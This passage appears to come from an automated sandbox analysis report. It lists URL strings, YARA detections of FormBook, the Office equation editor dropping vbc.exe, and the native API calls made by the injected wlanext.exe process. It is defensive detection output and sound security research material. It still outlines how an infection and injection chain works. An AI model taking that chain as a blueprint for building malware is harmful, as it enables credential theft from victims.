          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216497728.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2225535708.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181CB NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041827B NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418222 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041842A NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009210D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009201D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00921148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8280 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8300 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D81CB NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8222 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D827B NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D83AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D842A NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CB21
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00933040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D63BF
